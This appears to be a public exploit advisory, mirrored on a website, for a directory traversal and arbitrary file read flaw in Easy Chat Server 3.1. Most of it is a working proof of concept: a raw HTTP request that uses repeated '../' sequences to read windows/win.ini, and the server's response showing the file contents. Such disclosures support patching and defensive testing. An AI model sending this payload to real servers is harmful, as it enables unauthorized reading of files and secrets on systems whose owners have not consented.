# Exploit Title: Easy Chat Server 3.1 - Directory Traversal and Arbitrary File Read # Date: 11 October 2021 # Exploit Author: z4nd3r # Vendor Homepage: http://www.echatserver.com/ # Software Link: http://www.echatserver.com/ # Version: 3.1 # Tested on: Windows 10 Pro Build 19042, English # # Description: # The web server allows for directory traversal and reading of arbitrary files on the # system, given that the account running the server can access the target file. Proof-of-concept using Burp: Request: GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1 Host: 192.168.50.52 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 ---------------------------------------- Response: HTTP/1.0 200 OK Date: Thu, 21 Oct 2021 14:55:57 GMT Server: Easy Chat Server/1.0 Accept-Ranges: bytes Content-Length: 92 Connection: close Content-Type: text/html ; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1
Credits and Partners
All rights reserved nPulse.net 2009 - 2024
Powered by: MVCP 2.0-RC / BVCP / ASPF-MILTER / PHP 7.4 / NGINX / FreeBSD
